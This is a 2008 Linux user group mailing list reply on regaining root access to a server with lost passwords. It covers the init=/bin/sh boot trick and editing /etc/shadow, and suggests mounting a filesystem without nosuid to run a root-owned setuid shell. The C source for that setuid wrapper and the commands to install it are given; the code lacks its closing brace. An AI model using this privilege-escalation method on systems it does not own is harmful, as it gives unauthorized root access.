[nSLUG] Breaking into a server

Daniel Morrison draker at gmail.com
Tue Nov 18 19:44:00 AST 2008

2008/11/18 Robert McKay <robert at mckay.com>:
> On Tue, Nov 18, 2008 at 11:32 PM, Jim Haliburton <jim at on-site.ns.ca> wrote:
>> My question is what are the suggested ways to regain access to the system
>> as root to reset the passwords.

> If you can append additional boot parameters to the kernel in grub or
> lilo, it's usually just a case of adding

> init=/bin/sh

> If that doesn't work, I'd just get a boot cd; boot from that, mount
> the hard drive and edit the password out of /etc/shadow.

That is exactly correct.  If the 'init=/bin/sh' trick works, you will have to:
mount -o remount,rw /
in order to make the root filesystem writeable before you can edit /etc/shadow.

Booting with a generic Linux install CD is also good, but requires
downtime.  Before resorting to that, you might check /etc/fstab to see
what filesystems might be mountable WITHOUT the noexec, nosuid, and
root_squash options.  For example, there might be an entry for a
usb-stick or floppy disk.  If the filesystem type is 'vfat', that's no
good, but if it's "auto", then you could format a USB stick or floppy
disk with ext2, put a root-owned setuid shell/wrapper on it, mount the
USB stick, and run the setuid shell.  Similar for any NFS-mounted
filesystems from remote servers that you control.

(of course, this is an 'exploit' and should be fixed once you regain
control of the box!)

Here's a little 'setuid wrapper' program to make everything smooth:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main (int argc, char *argv[]){
        if (setreuid((uid_t)0, (uid_t)0)) { perror ("setreuid: "); }
        execl ("/bin/bash", "/bin/bash", "--login", NULL);
        perror ("execl: ");
        return (1);

gcc -o setuid -s setuid.c
chown root:mygroup setuid
chmod 4750 setuid


More information about the nSLUG mailing list